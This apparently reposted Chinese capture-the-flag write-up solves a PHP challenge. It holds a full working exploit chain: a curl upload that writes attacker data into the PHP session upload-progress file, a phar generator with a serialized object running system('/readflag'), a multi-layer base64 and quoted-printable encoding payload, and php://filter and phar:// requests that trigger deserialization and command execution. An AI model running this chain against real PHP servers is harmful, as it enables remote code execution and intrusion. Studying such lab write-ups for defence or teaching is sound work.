step 1
搭建容器
教程
标题
github.com
Dockerfile 有点题目,手动修复一下
- FROM php:7.2-apache
- COPY ./flag /root
- COPY ./readflag /
- COPY ./html/ /var/www/html/
- COPY ./php.ini /usr/local/etc/php/php.ini
- COPY ./readflag /readsecret
- RUN chmod 755 /var/www/html && chown -R root:www-data /var/www/html && chmod 400 /root/flag && chmod 4111 /readflag
复制代码 修改php ini
- ; session.upload_progress.cleanup = On
- session.upload_progress.cleanup = Off
复制代码 不修改的话/tmp里的东西会被删掉,就看不了了
step 2
- <?php
- $SECRET = `/readsecret`;
- include "waf.php";
- class User {
- public $role;
- function __construct($role) {
- $this->role = $role;
- }
- }
- class Admin{
- public $code;
- function __construct($code) {
- $this->code = $code;
- }
- function __destruct() {
- echo "Admin can play everything!";
- eval($this->code);
- }
- }
- function game($filename) {
- if (!empty($filename)) {
- if (waf($filename) && @copy($filename , "/tmp/tmp.tmp")) {
- echo "Well done!";
- } else {
- echo "Copy failed.";
- }
- } else {
- echo "User can play copy game.";
- }
- }
- function set_session(){
- global $SECRET;
- $data = serialize(new User("user"));
- $hmac = hash_hmac("sha256", $data, $SECRET);
- setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
- }
- function check_session() {
- global $SECRET;
- $data = $_COOKIE["session-data"];
- list($data, $hmac) = explode("-----", $data, 2);
- if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac) || !hash_equals(hash_hmac("sha256", $data, $SECRET), $hmac)) {
- die("hacker!");
- }
- $data = unserialize($data);
- if ( $data->role === "user" ){
- game($_GET["filename"]);
- }else if($data->role === "admin"){
- return new Admin($_GET['code']);
- }
- return 0;
- }
- if (!isset($_COOKIE["session-data"])) {
- set_session();
- highlight_file(__FILE__);
- }else{
- highlight_file(__FILE__);
- check_session();
- }
- User can play copy game.
复制代码 我们可以利用Session临时文件,关于临时文件,请看以下文章
国城杯n0ob_un4er-wp - Litsasuk - 博客园
PHP: Session 上传进度 - Manual
浅谈 SESSION_UPLOAD_PROGRESS 的利用-腾讯云开发者社区-腾讯云
这里第二个file是什么不紧张,只要是文件就可以
- curl http://127.0.0.1:1337/ -H 'Cookie: PHPSESSID=litsasuk' -F 'PHP_SESSION_UPLOAD_PROGRESS=[Your_data]' -F 'file=@/etc/passwd'
- root@07710596cbbe:/# cd ./tmp
- root@07710596cbbe:/tmp# ls
- sess_litsasuk
- root@07710596cbbe:/tmp# cat sess_litsasuk
- upload_progress_[Your_data]|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码 step 3
copy可以通过伪协议触发phar反序列化
- <?php
- highlight_file(__FILE__);
- class Admin{
- public $code;
- }
- @unlink('test.phar');
- $phar=new Phar('test.phar');
- $phar->startBuffering();
- $phar->setStub('<?php __HALT_COMPILER(); ?>');
- $o=new Admin();
- $o ->code="system('/readflag');";
- $phar->setMetadata($o);
- $phar->addFromString("test.txt","test");
- $phar->stopBuffering();
- ?>
复制代码 step 4
试验
- <?php
- // 文件名
- $inputFile = 'test'; // 输入文件名
- $outputFile = 'test'; // 输出文件名
-
- // 打开输入文件并读取内容
- $inputHandle = fopen("php://filter/read=convert.base64-decode/resource=$inputFile", 'r');
- if (!$inputHandle) {
- die("无法打开输入文件: $inputFile");
- }
-
- // 读取解码后的内容
- $decodedContent = stream_get_contents($inputHandle);
- fclose($inputHandle);
-
- // 打开输出文件并写入解码后的内容
- $outputHandle = fopen($outputFile, 'w');
- if (!$outputHandle) {
- die("无法打开输出文件: $outputFile");
- }
-
- fwrite($outputHandle, $decodedContent);
- fclose($outputHandle);
-
- echo "文件解码并写回成功!";
- ?>
复制代码 原理部分
字符串“Man”的Base64编码
- 输入数据:
- 字符串“Man”的ASCII码是:
- M: 77 (01001101)
- a: 97 (01100001)
- n: 110 (01101110)
复制代码 - 归并成二进制数据:
- 01001101 01100001 01101110
复制代码
- 分成6位块:
- 划分后得到:
- 010011 010110 000101 101110
复制代码
- 转换为十进制:
- 映射到Base64字符集:
因此,字符串“Man”被Base64编码后就是“TWFu”。
字符串“Ma”的Base64编码
- 输入数据:
- 字符串“Ma”的ASCII码是:
- M: 77 (01001101)
- a: 97 (01100001)
复制代码
- 补齐到3字节:
- 补齐后酿成:
- 01001101 01100001 00000000
复制代码
- 分成6位块:
- 划分后得到:
- 010011 010110 000100 000000
复制代码
- 转换为十进制:
- 映射到Base64字符集:
- 添加填充字符:
- 因为原始数据不足3字节,我们在末端添加一个等号(=),表现有1个字节填充。
- 终极效果是:
TWE=
试验开始
decode->
and
decode->
试验得出结论,php在base64解码时会忽视base64表以外的内容,base64表如下
- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
复制代码 upload_progress_ 的有用字符只有14个,以是
从docker抓取文件内容试验
- upload_progress_aad2lu|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码 decode->
- 簷hi趉?薏茪win
- k?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
复制代码 我们能看到win
在其中
我们再双重编码一下win
- ZDJsdUNnPT0
- upload_progress_aaZDJsdUNnPT0|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
- 簷hi趉?薏茪d2luCg==嫱t仓卅z-{?}舆5砠^炠^?a媫第蛓o+^矚鑡?y胤踋?y絣屮频婩怀]夐]潻灣団曤8潻灣猌蔡乘f蛒榠 髣?9z鸿?,嶷'y絣譑-j籱奼⒆谨鬏=骩5寮瓃蔾∏鏱巯;
复制代码 我们能看到d2lu在其中,但是有一个题目,前面的有用字符不够了,只有两个破坏对齐了就没办法精确解码了,我们可以试试这样
编码 222—d2lu
- YWEtLS1kMmx1
- upload_progress_aaMjItLS1kMmx1=|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码 decode->
- 簷hi趉?薏茪22---d2luk?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
复制代码 失败了,我们换个方法
Quoted-Printable 是一种用于编码数据的方式,特殊是在电子邮件传输(MIME 标准)中广泛使用。它的主要目的是确保数据在差别系统之间传输时保持同等性,制止因编码题目导致的数据破坏。
特点:
- 可读性:大部分可打印的ASCII字符在编码后保持不变,因此人类可以在肯定程度上阅读编码后的内容。
- 安全性:非ASCII字符和特殊字符会被编码为 =XX 的格式,其中 XX 是该字符的十六进制ASCII码。
- 换行处理惩罚:长行会被拆分,并在行尾使用 = 表现续行。
Quoted-Printable 解码
Quoted-Printable 解码 是指将使用 Quoted-Printable 编码的数据转换回原始的可读格式。这个过程包括:
- 识别转义序列:查找以 = 开头的序列,这些序列表现特定的字符。例如,=3D 表现 = 字符,=0A 表现换行符。
- 转换字符:将这些转义序列转换回它们对应的原始字符。
- 处理惩罚换行:移除行尾的 = 并归并拆分的行。
这个东西编码后的密文只会是3的倍数,确保了对齐,我们直接用wp的有用负载研究原理
- <?php
-
- // 假设这是经过编码处理的最终 Base64 编码字符串
- $encoded_string = file_get_contents('./test.txt');
-
- // 第一步:Base64 解码
- $base64_decoded = base64_decode($encoded_string);
- $base64_decoded = base64_decode($base64_decoded);
- $base64_decoded = base64_decode($base64_decoded);
- echo "Step 1 - Base64 Decode:
- ";
- echo $base64_decoded . "
- ";
-
- // 第二步:Quoted-Printable 解码
- $quoted_printable_decoded = quoted_printable_decode($base64_decoded);
- echo "Step 2 - Quoted-Printable Decode:
- ";
- echo $quoted_printable_decoded . "
- ";
-
- // 第四步:Base64 解码(再次)
- $final_decoded = base64_decode($quoted_printable_decoded);
- echo "Step 4 - Final Base64 Decode:
- ";
- echo $final_decoded . "
- ";
- ?>
- import base64
- # 读取文件内容
- with open('test.phar', 'rb') as file:
- file_content = file.read()
- # 第一步:将文件内容进行 Base64 编码
- base64_encoded = base64.b64encode(file_content).decode('utf-8')
- # 第二步:将 Base64 编码后的内容转换为指定的格式
- encoded_str = ''.join(['=' + hex(ord(char))[2:] + '=00' for char in base64_encoded]).upper()
- # 打印结果
- print(encoded_str)
- upload_progress_ZZVUZSVmQxQlVRWGRRVkZFd1VGUkJkMUJVVFRWUVZFRjNVRlJqTTFCVVFYZFFWRmw0VUZSQmQxQlVVVFJRVkVGM1VGUlJlRkJVUVhkUVZGa3pVRlJCZDFCVVZUUlFWRUYzVUZSTmVGQlVRWGRRVkUwMVVGUkJkMUJVVVRWUVZFRjNVRlJWZUZCVVFYZFFWRlV4VUZSQmQxQlVZelJRVkVGM1VGUlZNVkJVUVhkUVZGVTBVRlJCZDFCVVRYZFFWRUYzVUZSU1JsQlVRWGRRVkZWM1VGUkJkMUJVVlRCUVZFRjNVRlJWTWxCVVFYZFFWRkY1VUZSQmQxQlVVa0pRVkVGM1VGUlZNRkJVUVhkUVZGRXhVRlJCZDFCVVZUSlFWRUYzVUZSVmVsQlVRWGRRVkZKRFVGUkJkMUJVVVhwUVZFRjNVRlJhUTFCVVFYZFFWRTB6VUZSQmQxQlVVVFZRVkVGM1VGUlJNRkJVUVhkUVZFMDBVRlJCZDFCVVNrTlFWRUYzVUZSUk1GQlVRWGRRVkZWNFVGUkJkMUJVWTNkUVZFRjNVRlJqTUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSVmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY1VUZSQmQxQlVVVEZRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSTmVsQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVWVEJRVkVGM1VGUmtRbEJVUVhkUVZGcEhVRlJCZDFCVVRYaFFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJSZVZCVVFYZFFWRlpDVUZSQmQxQlVVVE5RVkVGM1VGUk5lRkJVUVhkUVZHTjNVRlJCZDFCVVdYbFFWRUYzVUZSWk5WQlVRWGRRVkZFMVVGUkJkMUJVVFRKUVZFRjNVRlJTUlZCVVFYZFFWRlV3VUZSQmQxQlVZM2RRVkVGM1VGUk5NMUJVUVhkUVZGbDZVRlJCZDFCVVpFSlFWRUYzVUZSYVIxQlVRWGRRVkUxM1VGUkJkMUJVVWtkUVZFRjNVRlJaTlZCVVFYZFFWRkpDVUZSQmQxQlVXa0pRVkVGM1VGUlplVkJVUVhkUVZFMTVVRlJCZDFCVVZYbFFWRUYzVUZSYVJGQlVRWGRRVkZFMVVGUkJkMUJVV2tKUVZFRjNVRlJqTUZCVVFYZFFWR1JDVUZSQmQxQlVVa2RRVkVGM1VGUmFRbEJVUVhkUVZGRTFVRlJCZDFCVVl6TlFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJrUWxCVVFYZFFWRmt4VUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVZrSlFWRUYzVUZSVk0xQlVRWGRRVkUxM1VGUkJkMUJVV2tkUVZFRjNVRlJTUWxCVVFYZFFWR00xVUZSQmQxQlVUVFZRVkVGM1VGUmpOVkJVUVhkUVZGWkNVRlJCZDFCVVZUTlFWRUYzVUZSUk1sQlVRWGRRVkZwRFVGUkJkMUJVVmtKUVZFRjNVRlJhUlZCVVFYZFFWR00wVUZSQmQxQlVXVFJRVkVGM1VGUldRbEJVUVhkUVZHTTFVRlJCZDFCVVdYcFFWRUYzVUZSamQxQlVRWGRRVkZKSFVGUkJkMUJVWXpWUVZFRjNVRlJSTlZCVVFYZFFWRTB6VUZSQmQxQlVXVEpRVkVGM1VGUlZlRkJVUVhkUVZGa3pVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhsUVZFRjNVRlJOZDFCVVFYZFFWRlpDVUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVVrUlFWRUYzVUZSYVJsQlVRWGRRVkZWNVVGUkJkMUJVVFRCUVZFRjNVRlJaTUZCVVFYZFFWRkY0VUZSQmQxQlVWWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk1GQlVRWGRRVkZrd1VGUkJkMUJVVlRSUVZFRjNVRlJSZVZCVVFYZFFWR013VUZSQmQxQlVXa1pRVkVGM1VGUlJlVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJqTkZCVVFYZFFWRXBEVUZSQmQxQlVXVEpRVkVGM1VGUk5OVkJVUVhkUVZGazFVRlJCZDFCVVRYbFFWRUYzVUZSUmVGQlVRWGRRVkZWNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk5GQlVRWGRRVkZWNVVGUkJkMUJVV2tSUVZFRjNVRlJaZWxCVVFYZFFWRTE2VUZSQmQxQlVWWGxRVkVGM1VGUlNRbEJVUVhkUVZGVjVVRlJCZDFCVVVrZFFWRUYzVUZSTmQxQlVRWGRRVkdNeVVGUkJkMUJVVlRWUVZFRjNVRlJqTVZCVVFYZFFWRkpEVUZSQmQxQlVUVEZRVkVGM1VGUk5NVkJVUVhkUVZGSkNVRlJCZDFCVVRYcFFWRUYzVUZSV1FsQlVRWGRRVkdONVVGUkJkMUJVU2tOUVZFRjNVRlJSTkZCVVFYZFFWR04zVUZSQmQxQlVUVEJRVkVGM1VGUk5NMUJVUVhkUVZGRXlVRlJCZDFCVVVrTlFWRUYzVUZSWk5GQlVRWGRRVkZwSFVGUkJkMUJVVlRCUVZFRjNVRlJaTWxCVVFYZFFWRkV6VUZSQmQxQlVZek5RVkVGM1VGUlJOVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVRSUVZFRjNVRlJWZUZCVVFYZFFWRnBEVUZSQmQxQlVUWGhRVkVGM1VGUlJlbEJVUVhkUlZVWkNVVlZHUWxGVlJrSlJWVVpD|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码 注意,必须填充A(解码后为0)确保每次加密后不存在=
- Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAw? Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAw? Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt?g~?testID?/b??????J???GBMB
复制代码 不填充ZZ填充FF也可以,主要在于其解码后字符化为的有用字符数是否能对齐(自己解码试试!)
- Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAw? Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAw? Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt?g~?testID?/b??????J???GBMB
复制代码
step 5
1.让copy从临时文件读取数据到/tmp/tmp.tmp
- ?filename=php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=filename
复制代码 此处利用方法不唯一,大概有更简单的
字符串过滤器
转换过滤器
2.从tmp中解码文件并剖析phar中的test.txt文件触发反序列化来实验命令(如果没关php默认清除需要条件竞争)
- phar:///tmp/tmp.tmp/test.txt
复制代码 end – 24-12-12
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |